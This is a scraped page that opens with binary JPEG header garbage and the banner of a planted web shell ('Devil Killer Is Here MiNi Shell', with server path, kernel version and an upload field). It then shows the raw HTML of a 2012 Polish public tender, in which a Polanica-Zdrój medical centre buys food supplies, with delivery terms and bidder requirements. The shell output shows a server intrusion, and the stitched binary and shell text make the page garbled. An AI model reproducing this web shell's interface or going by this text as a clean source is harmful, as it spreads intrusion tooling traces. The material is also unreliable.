JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120416/119802-N-2012.html

<p class="kh_header"><b>Polanica-Zdrój: ZP/ PN /dostawa artykułów spożywczych /13 /12/</b><br>
<b>Numer ogłoszenia: 119802 - 2012; data zamieszczenia: 16.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczne Centrum Medyczne SP ZOZ , ul. Jana Pawła II 2, 57-320 Polanica-Zdrój, woj. dolnośląskie, tel. 74 8621101, 8621121, faks 74 8621102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.scm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/ PN /dostawa artykułów spożywczych /13 /12/.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy artykułów spożywczych: mięsa i produktów mięsnych, produktów mleczarskich, różnych produktów spożywczych, drobiu, ryb przetworzonych i konserwowanych, owoców i warzyw  dla Specjalistycznego Centrum Medycznego Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Polanicy Zdroju

 1. Przedmiotem zamówienia  są  sukcesywne  dostawy  artykułów  spożywczych  w ilości 
    i asortymencie określonym w załącznikach  nr od 1a do 1p oraz  załączniku nr A  do SIWZ.    
 2.  Przedmiot zamówienia winien być wytwarzany zgodnie z obowiązującymi przepisami,
    a w szczególności  z:  
    a) ustawą z dnia 25.08.2006  r. o bezpieczeństwie  żywności i żywienia (Dz. U. z 2006 r. Nr 
    171,   poz. 1225 z póź. zm.), oraz aktami wykonawczymi wydanymi na podstawie tej ustawy,
    b) Rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007r. w sprawie 
      znakowania  środków spożywczych i dozwolonych substancji dodatkowych (Dz. U. Nr 137).
 3.  Warunki dodatkowe dotyczące przedmiotu zamówienia: 
    Dostawy przedmiotu zamówienia winny być  realizowane do obiektu  Specjalistycznego 
    Centrum Medycznego Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Polanicy 
    Zdroju przy ul. Jana Pawła II 2 w Polanicy Zdroju, do magazynów  żywnościowych 
    położonych w punktach żywienia   transportem  Wykonawcy i na jego koszt .
 4. Przedmiot zamówienia winien być dostarczony wyłącznie specjalistycznym transportem,  
    spełniającym   warunki określone w Rozporządzeniu Ministra Zdrowia z dnia 25.08.2006 roku 
    w  sprawie bezpieczeństwa żywności i  żywienia ( D.U nr j.w.).
 5.  Każde zamówienie Zamawiającego będzie składane na piśmie (dopuszczalna jest  forma faksu 
     i e-maila ), przez  specjalistę ds. żywienia lub magazyniera, do godziny 10:00 w dniu 
     poprzedzającym dostawę z określeniem asortymentu i jego ilości.
 6.  Wykonawca zobowiązuje się do dostaw towarów,  które będą odbywały się w okresie  
    obowiązywania   umowy - sukcesywnie- w/g ustalonego, tygodniowego harmonogramu tj.: 

   Dla mięsa i wyrobów mięsnych:  we wtorki i czwartki, w godzinach od 7:00-1100, a w 
   uzasadnionych   przypadkach także w inne dni wskazane przez Zamawiającego. Dostawa 
   i odbiór towaru odbywać się będzie zgodnie z formularzem cenowym - zał. nr 1a  do SIWZ.
  Towary muszą spełniać wszelkie wymagania przewidziane obowiązującym prawem, w  
  szczególności wszelkie wymagania weterynaryjne. 
   Zamawiający wymaga aby  mięsa surowe były dostarczane w ciągu  24 godzin  od zakończenia  
   rozbioru półtuszy,  a wędliny w ciągu  24 godzin od zakończenia produkcji.
  Mięsa surowe oraz stosowane w produkcji przetworów mięsnych  muszą pochodzić bezpośrednio 
  od producenta - zakładów dokonujących ubój.
  Pojemniki z dostarczonym towarem muszą być zamknięte oraz opatrzone metką papierową lub 
  opaską z tworzyw sztucznych  zawierającą zapis daty i godziny produkcji, pieczęć producenta oraz
  imię i nazwisko osoby pakującej ( bądź jego numer).
  Zamawiający wymaga stałości cen w części 1  w okresie obowiązywania umowy.
  Jednakże w przypadku udokumentowanej zmiany cen żywca ( w części 1) o minimum 30% 
  w  stosunku  do cen obowiązujących w dniu podpisania umowy Strony zastrzegają sobie prawo 
  negocjowania cen, które zostaną zatwierdzone aneksem do umowy, przy czym wzrost cen lub ich 
  spadek nie może  przekroczyć procentowej różnicy zmiany cen.
  Podstawą do wykazania wzrostu spadku cen żywca będą notowania Wojewódzkiego Ośrodka
  Doradztwa Rolniczego znajdującego się na terenie działania Wykonawcy.

  Dla dostaw innych artykułów spożywczych tj. produktów mleczarskich, różnych produktów 
  spożywczych, drobiu, ryb przetworzonych i konserwowanych oraz warzyw i owoców przetworzonych:

      Wykonawca zobowiązuje się do: 
 1.  terminowych dostawy produktów mleczarskich i piekarniczych jednokrotnie w ciągu   każdego dnia 
   tygodnia (oprócz sobót, niedziel i świąt) na podstawie szczegółowych zamówień 
   z poszczególnych obiektów, złożonych pisemnie, telefonicznie (faksem) lub e - mailem przez osoby 
   upoważnione przez Zamawiającego bezpośrednio do wskazanych obiektów Zamawiającego w godz. od 
   7:00 do 11:00,  zgodnie z  zał. nr 1b, zał. nr 1i,
 2.   terminowych dostaw różnych produktów spożywczych jeden raz w tygodniu w ustalony 
   przez strony w drodze ustnego porozumienia dzień do godz. 11:00 (z wyjątkiem sobót, 
   niedziel i świąt), na podstawie szczegółowych zamówień  z poszczególnych obiektów, 
   złożonych pisemnie, telefonicznie (faksem) lub e - mailem przez osoby upoważnione 
   przez Zamawiającego, zgodnie z  zał. nr 1c, zał. nr 1ł, zał. nr 1m, zał. nr 1n, zał. 1o, zał. 1p
 3. terminowych dostaw drobiu dwa razy w tygodniu  (z wyjątkiem sobót, niedziel i świąt)
     w ustalone w drodze ustnego porozumienia dni robocze do godz. 10:00 - na podstawie
    szczegółowych zamówień  z poszczególnych obiektów, złożonych pisemnie, 
    telefonicznie (faksem) lub e - mailem przez osoby upoważnione przez Zamawiającego,
    zgodnie z  zał. nr 1d,   
 4.  w przypadku dostaw, ryb przetworzonych i konserwowych oraz owoców i warzyw 
     przetworzonych dwa razy w tygodniu w  ustalony przez strony w drodze ustnego
     porozumienia dzień do godz. 11:00 z wyjątkiem  sobót, niedziel i świąt , zgodnie
      zał. nr 1e , zał. nr 1h, zał. nr 1f,

 7 .  Wykonawca zobowiązuje się realizować na  rzecz  Zamawiającego systematycznie dostawy artykułów
     spożywczych wyszczególnionych  w formularzach  cenowych  stanowiących  załączniki nr:  od 1b 
      do   1p  do SIWZ.
 8.  Wykonawca będzie wykonywał dostawy na podstawie szczegółowych zamówień z poszczególnych
     magazynów obiektu SCM SP ZOZ  złożonych pisemnie (dopuszczalna jest  forma faksu i e-maila ),  
    w trakcie bieżącej dostawy przez osoby upoważnione przez Zamawiającego.
 9. Ze strony Zamawiającego upoważnionymi do odbioru towaru i sprawdzenia jego jakości są    
    magazynierzy. 
 
 10. Dostarczane produkty winny spełniać wszystkie wymogi określone w  obowiązujących dla nich  
      normach. Nadto produkty  powinny mieć oznaczony termin przydatności do spożycia i powinny być 
      dostarczone nie później  jak przed upływem połowy tego terminu.
 11.  W razie wątpliwości co do jakości dostarczanych produktów, Zamawiający zleci przeprowadzenie 
      badań przez specjalistyczne laboratorium. W razie stwierdzenia odchyleń od normy, kosztami badania 
      obciążony zostanie Wykonawca.
 12.  Ewentualne zmiany dotyczące zamówienia będą odbywać się w formie telefonicznej. Wykonawca  
     gwarantuje Zamawiającemu, że przedmiot zamówienia będzie wolny od cech powszechnie  
     uznawanych za wady jakościowe takie jak: gorzki, kwaśny zbyt słony smak, stęchły, zanieczyszczony 
      mechanicznie, z objawami pleśni, psucia, zawilgocenia oraz uszkodzenia.
     
     W przypadku udokumentowania zmiany cen ( w częściach od 2 do 13 ) przewyższających 40% w
     stosunku do cen obowiązujących w dniu podpisania umowy, Strony zastrzegają sobie  prawo 
     zmiany cen, które zostaną  zatwierdzone aneksem do umowy  i zmiana taka traktowana będzie
     jako wyczerpująca przesłanki przewidziane w art. 144 ustawy prawo zamówień publicznych. 

     Dla dostaw warzyw i  owoców Wykonawca zobowiązuje się do: 
     1)  terminowej dostawy warzyw i owoców ( dwa razy w tygodniu  oprócz sobót, niedziel i świąt), 
      bezpośrednio do wskazanych obiektów Zamawiającego w godz. od 700 do 1000,a w przypadku 
      dostaw ziemniaków jeden raz w tygodniu, w ustalony przez Strony w drodze ustnego porozumienia 
      dzień do godz. 1000 z wyjątkiem sobót, niedziel i świąt. 
  2)   W sytuacjach wyjątkowych ( nie dających się wcześniej przewidzieć ) Zamawiający
       zastrzega sobie dostawę towaru (ziemniaków) w czasie nie dłuższym niż 2 dni od 
      chwili zgłoszenia telefonicznego przez osobę upoważnioną przez  Zamawiającego,  
  3)   Wykonawca zobowiązuje się realizować na  rzecz  Zamawiającego systematycznie dostawy   
      warzyw i owoców i jaj wyszczególnionych  w formularzu   cenowym stanowiącym   
      zał. nr 1g , zał. nr 1j, zał. nr 1l, zał. 1k,   do SIWZ.    
 13.  Opakowanie i oznakowanie dostawy:  Przedmiot zamówienia dostarczany będzie w opakowaniach  
       zbiorczych - koszach plastikowych odpowiednio oznakowanych zgodnie z przepisami, ułożony wg 
        asortymentu w sposób gwarantujący zachowanie najwyższej jakości produktu. 
 14. Zamawiający informuje, że ilości i asortyment podane w formularzu cenowym są jedynie
       szacunkowymi  i mogą ulec zmianie (zmniejszeniu) w czasie trwania umowy w zależności od  
       rodzaju stosowanych  diet i ilości przyjmowanych pacjentów.      
 15.   Towar dostarczony przez Wykonawcę musi być:
      -  I gatunku, pozbawiony wad, 
      -  opatrzony w odpowiednie oznakowanie zawierające: nazwę producenta, warunki
         przechowywania i datę przydatności do spożycia,
      -  posiadać właściwe atesty, stosownie do obowiązujących przepisów
  16.  Strony ustalają, że z tytułu wykonania umowy w części 14, 15, 16, 17 zamówienia
       Wykonawcy  przysługuje zapłata, która   będzie każdorazowo ustalana według minimalnych 
        cen  jednostkowych  publikowanych przez Dolnośląską Giełdę Rolno-Spożywczą Targpiast
       (www.targpiast.com.pl) lub  przez Warszawski Rolno-Spożywczy Rynek Hurtowy S.A. 
       Bronisze  (www.ceny.fresh-market.pl) w sytuacjach wyjątkowych , gdy brak będzie 
       zamawianego towaru-asortymentu na Dolnośląskiej Giełdzie  Rolno-Spożywczej  Targpiast 
       plus minus  marżę upust   zaoferowaną przez Wykonawcę.  
 17.  Za wykonane  dostawy  Strony ustalają wynagrodzenie Wykonawcy, zgodnie
      z przyjętą ofertą, które będzie wyliczone  iloczynem wykonanych dostaw ( szt., kg) 
      i określonych minimalnych cen jednostkowych towarów opublikowanych na stronie 
      internetowej www.targpiast.com.pl  lub w wyjątkowych sytuacjach na stronie  
     (www.ceny.fresh-market.pl) z  dnia roboczego poprzedzającego dostawę, powiększonych
     lub pomniejszonych o stałą  marżę lub  upust zgodnie z  pisemnym zamówieniem.
 18.  Wykonawca łącznie z dostawą towaru przekaże druk WZ z cenami netto dostarczonych
       towarów z podsumowaną wartością netto oraz fakturą VAT za każdą dostawę (warzywa
       i owoce). 
 19.  Wykonawca zapewnia stałość marży/upustu stosowanej do średniej ceny giełdowej przez 
     cały  okres obowiązywania umowy.
 20. Dwa razy w miesiącu Wykonawca dostarczy zbiorcze zestawienie faktur, które będzie    
      podstawą do  dokonania zapłaty.
 
    Tam, gdzie w opisie przedmiotu zamówienia (formularzach cenowych - załącznikach 
    od nr 1b, 1c,1f, 1 i, 1m, 1h, 1e, 1o, 1l  do SIWZ) zostało wskazane pochodzenie (marka, 
    znak towarowy, producent) produktów spożywczych, Zamawiający dopuszcza oferowanie 
   produktów równoważnych. Gramatura oferowanego produktu równoważnego nie może być 
   niższa niż gramatura produktu wskazanego w załącznikach  jak wyżej. Zaoferowane produkty 
   równoważne muszą posiadać te same walory organoleptyczne (smak, zapach, barwa, 
   estetyka, konsystencja) oraz zawierać w swoim składzie te same surowce użyte do produkcji, 
   co produkt określony przez Zamawiającego - patrz załącznik A.

      Jeżeli Wykonawca zaoferuje produkt równoważny, zobowiązany jest dostarczyć wraz 
      z ofertą : 
      opis   pozycji równoważnych z podaniem ich producentów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja podmiotowa Wykonawców, w tym wymogi dotyczące wpisu do rejestru zawodowego lub handlowego: 

O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:
1.	Posiadają uprawnienia niezbędne do wykonywania działalności lub czynności stanowiących   przedmiot zamówienia, jeżeli przepisy nakładają obowiązek posiadania takich uprawnień;

      Opis sposobu dokonywania oceny spełniania tego warunku:
W celu wykazania  spełniania warunku udziału w postępowaniu Wykonawca jest zobowiązany przedstawić: 
           1) dla części 2 do 17 podpisane oświadczenie o spełnianiu  warunków udziału w 
               postępowaniu, zgodnie z treścią załącznika nr 2 do SIWZ.            
           2) dla części 1 zamówienia: aktualną (wystawioną nie wcześniej niż 6 miesięcy przed
               upływem terminu składania ofert) decyzję Powiatowego Lekarza Weterynarii o : 
               -  nadaniu weterynaryjnego numeru identyfikacyjnego, 
               -  posiadaniu uprawnień do uboju  świń i bydła oraz przetwórstwa mięsa w tym zakresie 
                  oraz,  
               -  że zakład jest pod stałym nadzorem Powiatowej Inspekcji Weterynaryjnej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku Wykonawca zobowiązany jest przedstawić: 
Podpisany przez Wykonawcę wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw, min. 1 dostawy ( dla każdej części zamówienia), polegające na dostarczeniu produktów spożywczych o wartości brutto na co najmniej: 79 tys. zł. dla części 1, 58 tys. zł. dla części 2, 75 tys. zł. dla części 3, 84 tys. zł. dla części 4, 28 tys. zł. dla części 5, 14 tys. zł. dla części 6, 24 tys. zł. dla części 7, 45 tys. dla części 8, 45 tys. dla części 9, 23 tys. dla części 10, 9 tys. dla części 11, 1 tys.  dla części 12, 4,8 tys.  dla części 13, 1 tys. dla części 14, 30 tys., dla części 15, 1 tys., dla części 16, 4,7 tys., dla części 17 11,7 tys.
 w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem min. po 1  dokumencie  potwierdzającym, że dostawy zostały wykonane lub są wykonywane należycie - wg zał. nr 4 do SIWZ ( Doświadczenie Wykonawcy).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku Zamawiający uzna złożenie przez Wykonawcę oświadczenia: o wdrożeniu lub wdrażaniu zasad GMP (dobra praktyka produkcyjna), GHP ( dobra praktyka higieniczna ) i systemu HACCP w firmie - dotyczy części 1 do 17 zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie warunku uzna przedłożenie przez Wykonawcę opłaconej polisy , a w przypadku jej braku innego dokumentu potwierdzającego , że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności do wartości brutto dla poszczególnych części jak w pkt. 2  na stronie 6-7 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
